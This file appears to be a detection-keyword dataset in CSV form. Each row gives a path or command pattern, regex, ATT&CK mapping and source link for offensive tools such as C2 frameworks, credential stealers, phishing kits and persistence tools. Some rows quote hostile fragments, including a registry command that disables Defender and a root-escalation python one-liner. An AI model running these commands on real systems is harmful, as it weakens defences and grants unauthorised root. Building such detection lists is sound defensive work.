"*/usr/bin/gsocket*",".{0,1000}\/usr\/bin\/gsocket.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","12270"
"*/usr/bin/gs-sftp*",".{0,1000}\/usr\/bin\/gs\-sftp.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","12271"
"*/usr/bin/legba*",".{0,1000}\/usr\/bin\/legba.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","#linux","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","12273"
"*/usr/bin/merlinAgent*",".{0,1000}\/usr\/bin\/merlinAgent.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","#linux","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","12337"
"*/usr/bin/pkexec*",".{0,1000}\/usr\/bin\/pkexec.{0,1000}","offensive_tool_keyword","POC","Exploit for the pwnkit vulnerability (https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team","T1068","TA0004","N/A","N/A","Exploitation tool","https://github.com/Ayrx/CVE-2021-4034","1","1","#linux","N/A","N/A","1","93","14","2022-01-27T11:57:05Z","2022-01-26T03:33:47Z","12338"
"*/usr/bin/polenum*",".{0,1000}\/usr\/bin\/polenum.{0,1000}","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","#linux","N/A","8","10","N/A","N/A","N/A","N/A","12339"
"*/usr/bin/shad0w*",".{0,1000}\/usr\/bin\/shad0w.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","0","#content #linux","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","12343"
"*/usr/include/sdfwex.h*",".{0,1000}\/usr\/include\/sdfwex\.h.{0,1000}","offensive_tool_keyword","NoodleRAT","AV signature of noodlerat malware","T1059.004 - T1078 - T1105 - T1100 - T1547.006","TA0003 - TA0005 - TA0010 - TA0011","N/A","N/A","Malware","https://www.trendmicro.com/en_us/research/24/f/noodle-rat-reviewing-the-new-backdoor-used-by-chinese-speaking-g.html","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","12344"
"*/usr/local/bin/escape.sh*",".{0,1000}\/usr\/local\/bin\/escape\.sh.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","12348"
"*/usr/local/bin/exegol*",".{0,1000}\/usr\/local\/bin\/exegol.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","12349"
"*/usr/local/bin/nullinux*",".{0,1000}\/usr\/local\/bin\/nullinux.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","0","#linux","N/A","7","6","575","101","2024-06-19T14:29:09Z","2016-04-28T16:45:02Z","12352"
"*/usr/local/bin/reverst*",".{0,1000}\/usr\/local\/bin\/reverst.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","#linux","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","12353"
"*/usr/local/bin/reverst*",".{0,1000}\/usr\/local\/bin\/reverst.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1572 - T1071.001 - T1105","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","#linux","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","12354"
"*/usr/local/bin/rsg*",".{0,1000}\/usr\/local\/bin\/rsg.{0,1000}","offensive_tool_keyword","rsg","reverse shell powershell","T1059.001 - T1203 - T1105 - T1562.001","TA0002 - TA0011","N/A","Black Basta","C2","https://github.com/mthbernardes/rsg","1","0","#linux","N/A","10","10","561","126","2024-05-03T16:33:20Z","2017-12-12T02:57:07Z","12355"
"*/usr/local/bin/sliver-server*",".{0,1000}\/usr\/local\/bin\/sliver\-server.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#linux","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","12356"
"*/usr/local/bin/sshamble*",".{0,1000}\/usr\/local\/bin\/sshamble.{0,1000}","offensive_tool_keyword","sshamble","SSHamble is a research tool for analyzing SSH implementations focusing on attacks against authentication - timing analysis and post-session enumeration.","T1021 - T1040 - T1592 - T1033","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/runZeroInc/sshamble","1","0","#linux","N/A","10","10","946","74","2025-04-07T15:08:38Z","2024-07-27T20:32:10Z","12357"
"*/usr/local/pwndrop/*",".{0,1000}\/usr\/local\/pwndrop\/.{0,1000}","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","#linux","N/A","10","10","2124","267","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z","12359"
"*/usr/sbin/tor*",".{0,1000}\/usr\/sbin\/tor.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","12363"
"*/usr/share/brutespray*",".{0,1000}\/usr\/share\/brutespray.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#linux","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","12367"
"*/usr/share/cobaltstrike/*",".{0,1000}\/usr\/share\/cobaltstrike\/.{0,1000}","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","0","#linux","N/A","10","10","1053","172","2024-06-25T11:10:54Z","2020-03-23T14:13:16Z","12368"
"*/usr/share/doc/chntpw*",".{0,1000}\/usr\/share\/doc\/chntpw.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","12370"
"*/usr/share/evilginx*",".{0,1000}\/usr\/share\/evilginx.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#linux","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","12374"
"*/usr/share/keyrings/tor-archive-keyring*",".{0,1000}\/usr\/share\/keyrings\/tor\-archive\-keyring.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","0","#linux","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","12375"
"*/usr/share/kidlogger*",".{0,1000}\/usr\/share\/kidlogger.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","12376"
"*/usr/share/metasploit*",".{0,1000}\/usr\/share\/metasploit.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","0","#linux","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","12377"
"*/usr/share/wordlists/*.txt*",".{0,1000}\/usr\/share\/wordlists\/.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","fcrackzip","a Free/Fast Zip Password Cracker","T1473 - T1021.002","TA0005 - TA0008","N/A","N/A","Credential Access","https://manpages.ubuntu.com/manpages/trusty/man1/fcrackzip.1.html","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12378"
"*/usr/src/netexec*",".{0,1000}\/usr\/src\/netexec.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#linux","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","12379"
"*/utils/addcomputer.py*",".{0,1000}\/utils\/addcomputer\.py.{0,1000}","offensive_tool_keyword","sam-the-admin","script used in the POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1208 - T1218.005 - T1055.002","TA0006 - TA0007 - TA0008","N/A","N/A","Exploitation tool","https://github.com/WazeHell/sam-the-admin/tree/main/utils","1","0","N/A","N/A","N/A","10","1012","193","2022-07-10T22:23:13Z","2021-12-11T15:10:30Z","12380"
"*/utils/external_drive_password_recovery.html*",".{0,1000}\/utils\/external_drive_password_recovery\.html.{0,1000}","offensive_tool_keyword","ExtPassword.exe","Nirsoft tool for Windows that allows you to recover passwords stored on external drive plugged to your computer","T1081 - T1003 - T1212","TA0006 - TA0009","N/A","LockBit","Credential Access","https://www.nirsoft.net/utils/external_drive_password_recovery.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","12381"
"*/utils/mailpv.html*",".{0,1000}\/utils\/mailpv\.html.{0,1000}","offensive_tool_keyword","MailPassView","Mail PassView is a small password-recovery tool that reveals the passwords and other account details for multiple email clients","T1003 - T1081 - T1110","TA0006 - TA0009","N/A","BlackSuit - Royal - GoGoogle - Kimsuky - Evilnum - XDSpy","Credential Access","https://www.nirsoft.net/utils/mailpv.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","12382"
"*/utils/network_password_recovery.html*",".{0,1000}\/utils\/network_password_recovery\.html.{0,1000}","offensive_tool_keyword","netpass","When you connect to a network share on your LAN or to your .NET Passport account. Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive. as long as you know the last log-on password.","T1081 - T1003 - T1555","TA0006 - TA0009","N/A","Kimsuky - XDSpy - TRAVELING SPIDER","Credential Access","https://www.nirsoft.net/utils/network_password_recovery.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","12383"
"*/utils/novnc_proxy*",".{0,1000}\/utils\/novnc_proxy.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/ms101/EvilKnievelnoVNC","1","0","#linux","N/A","9","1","44","8","2025-03-08T19:34:41Z","2024-04-13T22:05:04Z","12384"
"*/utils/obfuscate.py*",".{0,1000}\/utils\/obfuscate\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","12385"
"*/utils/passwordfox.html*",".{0,1000}\/utils\/passwordfox\.html.{0,1000}","offensive_tool_keyword","passwordfox","recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox","T1555.003 - T1003 - T1083","TA0006 ","N/A","LockBit - GoGoogle - 8BASE - XDSpy","Credential Access","https://www.nirsoft.net/utils/passwordfox.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","12386"
"*/utils/vnc_password.html*",".{0,1000}\/utils\/vnc_password\.html.{0,1000}","offensive_tool_keyword","VNCPassView","recover the passwords stored by the VNC tool","T1003 - T1555 - T1081","TA0006 - TA0007","N/A","GoGoogle - 8BASE","Credential Access","https://www.nirsoft.net/utils/vnc_password.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","12387"
"*/UTWOqVQ132/*",".{0,1000}\/UTWOqVQ132\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","12388"
"*/UUID_bypass.py*",".{0,1000}\/UUID_bypass\.py.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","1","N/A","N/A","10","8","758","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z","12389"
"*/v DisableAntiSpyware /t REG_DWORD /d 1 /f*",".{0,1000}\/v\sDisableAntiSpyware\s\/t\sREG_DWORD\s\/d\s1\s\/f.{0,1000}","offensive_tool_keyword","Disable-TamperProtection","disable TamperProtection and other Defender / MDE components","T1562.001 - T1562.007","TA0005","N/A","N/A","Defense Evasion","https://github.com/AlteredSecurity/Disable-TamperProtection","1","0","#registry","N/A","10","3","208","35","2024-06-06T14:44:59Z","2024-06-05T12:48:56Z","12391"
"*/v1.0.0/moonwalk_linux*",".{0,1000}\/v1\.0\.0\/moonwalk_linux.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","1","#linux","N/A","10","10","1440","129","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z","12392"
"*/vainject.c*",".{0,1000}\/vainject\.c.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","12393"
"*/vajra/phishApp.py*",".{0,1000}\/vajra\/phishApp\.py.{0,1000}","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tool","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","N/A","4","391","61","2025-02-21T16:40:23Z","2022-03-01T14:31:27Z","12394"
"*/vanity.exe*",".{0,1000}\/vanity\.exe.{0,1000}","offensive_tool_keyword","Dirty-Vanity","injection technique abusing windows fork API to evade EDRs","T1055 - T1562 - T1070 - T1027","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/Dirty-Vanity","1","1","N/A","N/A","10","7","633","86","2022-12-23T10:54:10Z","2022-11-24T10:54:00Z","12395"
"*/Vanity_Dump.exe*",".{0,1000}\/Vanity_Dump\.exe.{0,1000}","offensive_tool_keyword","RedTeam_Tools_n_Stuff","minidumpwritedump a RtlCreateProcessReflection copy of a targeted Windows process","T1070.004 - T1222 - T1070.003 - T1003.005 - T1057","TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/samkenxstream/SAMkenXCCorePHdLAwiN8SoLr77","1","1","N/A","N/A","7","1","1","1","2023-10-13T06:31:42Z","2023-10-04T13:43:37Z","12396"
"*/var/lib/ptunnel*",".{0,1000}\/var\/lib\/ptunnel.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001  -  T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","#linux","N/A","8","5","456","76","2024-11-27T18:34:33Z","2017-12-19T18:10:35Z","12399"
"*/var/lib/tor/*",".{0,1000}\/var\/lib\/tor\/.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","12400"
"*/var/log/apache2/forensic_log-10080.log*",".{0,1000}\/var\/log\/apache2\/forensic_log\-10080\.log.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","#linux","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","12402"
"*/var/log/evilginx*",".{0,1000}\/var\/log\/evilginx.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#linux","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","12404"
"*/var/log/exegol/*.log*",".{0,1000}\/var\/log\/exegol\/.{0,1000}\.log.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","12405"
"*/var/log/tor/*",".{0,1000}\/var\/log\/tor\/.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","12410"
"*/var/run/tor/control*",".{0,1000}\/var\/run\/tor\/control.{0,1000}","offensive_tool_keyword","nipe","An engine to make Tor network your default gateway","T1090 - T1095 - T1573","TA0005","N/A","N/A","Defense Evasion","https://github.com/GouveaHeitor/nipe","1","0","#linux","N/A","9","10","2029","321","2025-04-03T13:57:13Z","2015-09-07T18:47:10Z","12413"
"*/var/run/tor/tor.pid*",".{0,1000}\/var\/run\/tor\/tor\.pid.{0,1000}","offensive_tool_keyword","nipe","An engine to make Tor network your default gateway","T1090 - T1095 - T1573","TA0005","N/A","N/A","Defense Evasion","https://github.com/GouveaHeitor/nipe","1","0","#linux","N/A","9","10","2029","321","2025-04-03T13:57:13Z","2015-09-07T18:47:10Z","12414"
"*/var/tmp/.memory/diamorphine.c*",".{0,1000}\/var\/tmp\/\.memory\/diamorphine\.c.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","12415"
"*/var/tmp/.memory/diamorphine.h*",".{0,1000}\/var\/tmp\/\.memory\/diamorphine\.h.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","12416"
"*/var/tmp/.socket -p -c ""exec python3 -c \""import os;os.setuid(0);os.setgid(0);os.execl*",".{0,1000}\/var\/tmp\/\.socket\s\-p\s\-c\s\""exec\spython3\s\-c\s\\\""import\sos\;os\.setuid\(0\)\;os\.setgid\(0\)\;os\.execl.{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash functions","T1070.003 - T1059.004 - T1564.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","0","#linux","N/A","9","3","251","28","2025-04-21T11:23:41Z","2024-07-16T15:56:11Z","12417"
"*/var/www/html/dynasty_rce*",".{0,1000}\/var\/www\/html\/dynasty_rce.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","1","#linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","12418"
"*/var0xshell.git*",".{0,1000}\/var0xshell\.git.{0,1000}","offensive_tool_keyword","var0xshell","var0xshell - shell with xor encryption","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/var0xshell/tree/main","1","1","#linux","N/A","8","10","4","1","2023-01-09T06:53:42Z","2023-01-08T21:34:26Z","12419"
"*/vas/fuzzers/fuzz/*",".{0,1000}\/vas\/fuzzers\/fuzz\/.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","1","#linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","12420"
